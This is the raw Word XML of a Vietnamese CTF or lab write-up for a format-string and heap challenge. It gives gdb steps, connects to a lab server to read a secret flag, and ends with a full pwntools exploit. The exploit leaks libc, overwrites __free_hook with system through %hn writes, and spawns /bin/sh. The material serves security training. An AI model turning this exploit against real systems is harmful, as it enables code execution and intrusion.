        <w:t>Sau đó bên cửa sổ debug ấn enter đến khi nào format có chứa “</w:t>
      </w:r>
      <w:r w:rsidRPr="00483EB8">
        <w:t>%2</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00483EB8">
        <w:t>$hn</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6588B1F2" w14:textId="3B404F77" w:rsidR="00483EB8" w:rsidRDefault="00483EB8" w:rsidP="00483EB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nhập lệnh ni để step qua hàm printf:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EABB5AE" w14:textId="498437EC" w:rsidR="00483EB8" w:rsidRDefault="00483EB8" w:rsidP="00483EB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ni</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70624202" w14:textId="0541C4E9" w:rsidR="00483EB8" w:rsidRDefault="00483EB8" w:rsidP="00483EB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Chạy lệnh stack và ấn enter 2 lần, khi này có thể thấy được giá trị của hàm system đã đè thành công vào địa chỉ free_hook</w:t>
      </w:r>
      <w:r w:rsidR="00956AA2">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7DC7E5" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206A4B19" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:r>
        <w:t>Mục đích: Tìm được nội dung flag được giấu trên server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CFCCAF" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:r>
        <w:t>Các bước thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EC1DCE" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Thay đổi payload để thực hiện tấn công lên server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B404592" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>P = remote(‘192.168.1.2’, 1810)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB9D4CC" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Đọc file secret sau đó copy chuỗi số bí mật:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4325592C" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>cat .secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADAB645" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Thoát khỏi chương trình sau đó submit flag tại cửa sổ terminal của attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038F1AE9" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>echo “flag &lt;secret number&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240805B5" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E"/>
    <w:p w14:paraId="62CFB8E8" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>payload cuối cùng:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8615"/>
      </w:tblGrid>
      <w:tr w:rsidR="00723B6E" w14:paraId="5690D82E" w14:textId="77777777" w:rsidTr="000F22DC">
        <w:trPr>
          <w:trHeight w:val="2636"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AD9965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from</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t xml:space="preserve"> pwn </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0000FF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>import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p>
          <w:p w14:paraId="686A8A29"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elf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ELF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'./test'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A4323F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5CC7386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elf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process</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61CBD5C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gdb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attach</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p>
          <w:p w14:paraId="63D537FD" w14:textId="77777777" w:rsidR="00786493" w:rsidRDefault="00786493" w:rsidP="00786493">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gdb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attach</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8000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>"""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05D1D90E" w14:textId="77777777" w:rsidR="00786493" w:rsidRDefault="00786493" w:rsidP="00786493">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b *show+224</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E809007" w14:textId="77777777" w:rsidR="00786493" w:rsidRDefault="00786493" w:rsidP="00786493">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b delete</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0522414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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E2DEC8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pause</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12D793F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leak_payload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b'%10$p|%13$p'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="735448E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37E1F3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function to write value3 to value4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18802B2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def</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FF"/>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value4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value3</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0804CE3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setup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B67D34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 xml:space="preserve">write_addr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value3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1921D0B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 xml:space="preserve">write_addr_offset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write_addr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p>
          <w:p w14:paraId="4151E37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7D9008E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lo</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hi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ext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value4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value4</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value4 </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32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19B3248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 xml:space="preserve">write_arr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lo</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write_addr_offset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hi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write_addr_offset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ext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write_addr_offset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4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="088CD39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b/>
                <w:bCs/>
                <w:color w:val="880088"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>print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write_arr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D9F0AF3"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write_addr</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7973C8B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b/>
                <w:bCs/>
                <w:color w:val="0000FF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>for</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t xml:space="preserve"> i </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0000FF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t xml:space="preserve"> write_arr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69E9114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write addr offset to param2 using param1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D483B7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lastRenderedPageBreak/>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write_arr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p>
          <w:p w14:paraId="471D1A7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b'$hn'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="428C4A53"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1B0C33D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3E2E535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12410BD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payload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="646F6CD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21AFC0D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6E84A85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use param2 to modify value</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="723A844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p>
          <w:p w14:paraId="49F1185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param2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b'$hn'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="413EBFC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1F4F314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3C21FBF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7ECBC25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payload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69EA6ED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61AC4BE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29E9F16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EDE031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762A201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create block size 100</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="491DE0C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b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A461F9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0F35EAA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b'100'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2276B3A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leak_payload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ED6B1A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D6974E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trigger bug, leak stack, libc</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61B5E48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1A0E0F5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286FBB8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recvuntil</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 '</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6179D6A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raw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recvline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replace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b'\n'</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split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p>
          <w:p w14:paraId="1A2B94E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880088"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>print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raw</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14FB9D5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int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raw</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p>
          <w:p w14:paraId="13D0A48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645455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param1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6A81A9B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param2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0B59AC0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system_offset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0A293F6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offset_leak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6B71B7A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__free_hook_offset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r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="049FFAE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86868F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288FED2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int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raw</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0</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13</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p>
          <w:p w14:paraId="3488C83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offset_leak</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E755C1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system_offset</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="775AB91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__free_hook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__free_hook_offset</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E7BA65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18A9ECC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b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49ECF0D9"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21E07FE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b'200'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C97E7A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b'AABB'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A9E117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D10AD0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53CA416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22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113CDDA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23</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6710D89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24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0C52E3A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62F4C86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63B9C50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68C7952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lastRenderedPageBreak/>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b'c%21$hn'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BB2A2B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1F18DEE9"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#pause()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="182C4C5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767A5CB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F436C3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689A3E9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005FCF79"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b'c%22$hn'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76A6F34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7DD0C07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#pause()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C74883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2D9BABD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81BE72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717F24F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35BA369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32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b'c%23$hn'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43CCA89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1D6CF7C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pause</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="786B8E3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513B17B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630A860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25C38DC3"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5A222A8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b'/bin/sh\x00'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BC79D0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b'D'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63E09AD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3AA02C7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2DD6208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EF13527" w14:textId="0AAAB257" w:rsidR="00723B6E" w:rsidRDefault="00786493" w:rsidP="00786493">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>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interactive</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0DC253B3" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRPr="001B68EE" w:rsidRDefault="00723B6E" w:rsidP="00723B6E"/>
    <w:p w14:paraId="7311BE95" w14:textId="77777777" w:rsidR="00723B6E" w:rsidRDefault="00723B6E" w:rsidP="00723B6E"/>
    <w:p w14:paraId="29C2D0AC" w14:textId="77777777" w:rsidR="00F866B5" w:rsidRDefault="00F866B5"/>
    <w:sectPr w:rsidR="00F86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70C3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B104614A"/>
    <w:lvl w:ilvl="0" w:tplc="682617C8">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D3A6E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4EFCA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972226">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="165055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6E"/>
    <w:rsid w:val="002837C5"/>
    <w:rsid w:val="002A433D"/>
    <w:rsid w:val="00483EB8"/>
    <w:rsid w:val="005445A4"/>
    <w:rsid w:val="00723B6E"/>
    <w:rsid w:val="00786493"/>
    <w:rsid w:val="007E7A19"/>
    <w:rsid w:val="00956AA2"/>
    <w:rsid w:val="00B05DCE"/>
    <w:rsid w:val="00F4723E"/>
    <w:rsid w:val="00F866B5"/>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EEEB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B1B23910-19D2-4923-A219-71381D9E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493"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi"/>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B6E"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00723B6E"/>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DD</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Quoc Anh DD</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-02T01:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-02T02:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>